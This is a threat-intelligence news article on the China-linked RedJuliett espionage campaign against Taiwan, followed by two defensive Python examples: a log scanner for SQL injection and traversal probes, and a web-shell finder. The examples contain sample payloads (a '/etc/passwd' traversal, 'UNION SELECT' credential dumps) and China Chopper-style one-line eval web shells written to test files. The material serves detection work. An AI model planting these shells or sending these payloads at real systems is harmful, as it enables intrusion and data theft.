A suspected China-linked state-sponsored threat actor has been tied to a cyber espionage campaign targeting government, academic, technology, and diplomatic organizations in Taiwan between November 2023 and April 2024.
Recorded Future's Insikt Group is tracking the activity under the name RedJuliett, describing it as a cluster that operates out of Fuzhou, China, in support of Beijing's intelligence collection goals concerning the East Asian country. The same cluster is also tracked under the names Flax Typhoon and Ethereal Panda.
Other countries targeted by the group include Djibouti, Hong Kong, Kenya, Laos, Malaysia, the Philippines, Rwanda, South Korea, and the U.S.

In all, as many as 24 victim organizations have been observed communicating with the threat actor's infrastructure, including government agencies in Taiwan, Laos, Kenya, and Rwanda. The group is also estimated to have targeted at least 75 Taiwanese entities for broader reconnaissance and follow-on exploitation.
"The group targets internet-facing appliances such as firewalls, load balancers, and enterprise virtual private network (VPN) products for initial access, as well as attempting structured query language (SQL) injection and directory traversal exploits against web and SQL applications," the company said in a new report published today.
As previously documented by CrowdStrike and Microsoft, RedJuliett is known to use the open-source software SoftEther to tunnel malicious traffic out of victim networks and to rely on living-off-the-land (LotL) techniques to avoid detection. The group is believed to have been active since at least mid-2021.
"Additionally, RedJuliett used SoftEther to administer operational infrastructure consisting of both threat actor-controlled servers leased from virtual private server (VPS) providers and compromised infrastructure belonging to three Taiwanese universities," Recorded Future noted.
Successful initial access is followed by the deployment of the China Chopper web shell to maintain persistence, alongside other open-source web shells such as devilzShell, AntSword, and Godzilla. A few intrusions have also involved exploitation of the Linux privilege escalation vulnerability known as DirtyCow (CVE-2016-5195).
"RedJuliett is likely interested in collecting intelligence on Taiwan's economic policy and trade and diplomatic relations with other countries," it said.
"RedJuliett, like many other Chinese threat actors, is likely targeting vulnerabilities in internet-facing devices because these devices have limited visibility and security solutions available, and targeting them has proven to be an effective way to scale initial access."
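The SQL injection and directory traversal probing described in the report leaves traces in ordinary web server access logs. The following detector is an added example written for this page, not code from Recorded Future or from the report; the log lines it scans are constructed samples in Apache/nginx combined format, and the IPs, paths, and payloads in them are invented for illustration. It URL-decodes each request path repeatedly before matching, because both traversal and injection payloads are routinely sent encoded (or double-encoded) to slip past naive string matches.

```python
import re
from urllib.parse import unquote

# Constructed sample access log (combined format). Not taken from the report;
# the addresses, paths and payloads are invented for this example.
SAMPLE_LOG = """\
203.0.113.10 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php?page=home HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Mar/2024:10:01:05 +0000] "GET /index.php?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1843 "-" "Mozilla/5.0"
203.0.113.10 - - [12/Mar/2024:10:01:09 +0000] "GET /login.php?user=admin%27%20OR%20%271%27%3D%271&pass=x HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/Mar/2024:10:02:11 +0000] "GET /products.php?id=1%20UNION%20SELECT%20username,password%20FROM%20users-- HTTP/1.1" 200 2210 "-" "curl/8.0"
198.51.100.7 - - [12/Mar/2024:10:02:15 +0000] "GET /static/app.css HTTP/1.1" 200 900 "-" "curl/8.0"
"""

# Fields we need from a combined-format line: client IP, timestamp, method, path, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Directory traversal: any "../" once the path is decoded and backslashes normalised.
TRAVERSAL_RE = re.compile(r'\.\./')

# Common SQL injection markers: UNION SELECT, tautologies like ' OR '1'='1,
# trailing comment "--", inline comments, and time-based probes.
SQLI_RE = re.compile(
    r"(?i)(\bunion\b[\s/*]+\bselect\b"
    r"|'\s*or\s*'?\d+'?\s*=\s*'?\d+"
    r"|--\s*$"
    r"|/\*.*\*/"
    r"|\bsleep\s*\("
    r"|\bbenchmark\s*\()"
)


def normalize(path):
    """URL-decode up to three times (defeats %252e double encoding) and
    fold backslashes to forward slashes so one traversal pattern suffices."""
    cur, prev = path, None
    for _ in range(3):
        if cur == prev:
            break
        prev, cur = cur, unquote(cur)
    return cur.replace("\\", "/")


def classify(path):
    """Return the list of attack classes a single request path matches."""
    decoded = normalize(path)
    tags = []
    if TRAVERSAL_RE.search(decoded):
        tags.append("traversal")
    if SQLI_RE.search(decoded):
        tags.append("sqli")
    return tags


def scan(log_text):
    """Scan access-log text; return (ip, raw_path, tags) for each suspicious request."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-combined line; skip rather than crash
        tags = classify(m["path"])
        if tags:
            hits.append((m["ip"], m["path"], tags))
    return hits


def offenders(hits):
    """Aggregate hits per source IP so repeat probing stands out."""
    counts = {}
    for ip, _, _ in hits:
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, path, tags in scan(SAMPLE_LOG):
        print(f"{ip:15} {','.join(tags):18} {path}")
    print(offenders(scan(SAMPLE_LOG)))
```

Decoding before matching is the part that matters: the same regexes run on the raw path would miss the second and third sample lines entirely. In production you would also key the per-IP counts on a time window and feed them to whatever alerting you already run on the edge appliance logs the report says these actors favour.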
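China Chopper's server-side component is the textbook one-line web shell: a script that hands a request parameter straight to eval. A practical post-compromise check is therefore to sweep the web root for scripts that evaluate request data. The scanner below is an added example for this page, not tooling from Recorded Future or from any of the named shell projects; it builds a small constructed web root in a temporary directory (the file names and contents are invented) and flags files whose content matches eval-of-request patterns for PHP, ASPX and JSP. The regexes cover the classic one-liner forms only; encrypted or heavily obfuscated shells such as later Godzilla variants need a different approach (file integrity baselines, behavioural monitoring of the web server process).

```python
import os
import re
import tempfile

# Signatures for one-liner shells that evaluate attacker-controlled request data.
# These are the classic forms; they do not cover obfuscated or encrypted shells.
SHELL_PATTERNS = {
    # PHP: @eval($_POST['x']);  eval(base64_decode($_REQUEST['x']));  assert($_GET['x']);
    "php_eval_request": re.compile(
        r'@?\b(?:eval|assert)\s*\(\s*(?:base64_decode\s*\(\s*)?\$_(?:POST|GET|REQUEST|COOKIE)\s*\[',
        re.I,
    ),
    # ASPX (JScript): eval(Request.Item["x"], "unsafe")
    "aspx_eval_request": re.compile(
        r'\beval\s*\(\s*Request(?:\.Item)?\s*\[[^\]]*\]\s*,\s*"unsafe"', re.I
    ),
    # JSP: Runtime.getRuntime().exec(request.getParameter("x"))
    "jsp_exec_request": re.compile(
        r'Runtime\.getRuntime\(\)\.exec\s*\(\s*request\.getParameter\s*\(', re.I
    ),
}

# Only server-executed extensions are worth scanning; static assets are skipped.
WEB_EXT = {".php", ".phtml", ".php5", ".aspx", ".ashx", ".asp", ".jsp", ".jspx"}


def scan_file(path):
    """Return the names of every shell pattern that matches the file's content."""
    with open(path, "rb") as fh:
        text = fh.read().decode("utf-8", "replace")  # tolerate odd encodings
    return [name for name, rx in SHELL_PATTERNS.items() if rx.search(text)]


def scan_webroot(root):
    """Walk a web root; return sorted (relative_path, size_bytes, [patterns]) findings."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for fn in files:
            if os.path.splitext(fn)[1].lower() not in WEB_EXT:
                continue
            full = os.path.join(dirpath, fn)
            hits = scan_file(full)
            if hits:
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                findings.append((rel, os.path.getsize(full), hits))
    return sorted(findings)


def build_sample_webroot():
    """Create a constructed web root in a temp dir for demonstration (invented content)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    samples = {
        "index.php": '<?php $q = $_GET["q"]; echo htmlspecialchars($q); ?>',  # benign
        "uploads/img.php": "<?php @eval($_POST['password']);?>",  # China Chopper style
        "admin/cache.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["password"],"unsafe");%>',
        "static/app.css": "/* eval(Request.Item[x], \"unsafe\") in a comment, not executable */",
    }
    for rel, content in samples.items():
        full = os.path.join(root, rel)
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


if __name__ == "__main__":
    for rel, size, hits in scan_webroot(build_sample_webroot()):
        print(f"{size:6d}B  {rel:25} {', '.join(hits)}")
```

Very small files that match are the highest-confidence hits, which is why the size is reported next to each finding. Run this from a read-only mount or forensic copy, and treat a match in an upload directory or a cache folder, as in the constructed sample, as a strong signal that warrants pulling the web server's access logs for the requests that created it.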
Some elements of this post are sourced from:
thehackernews.com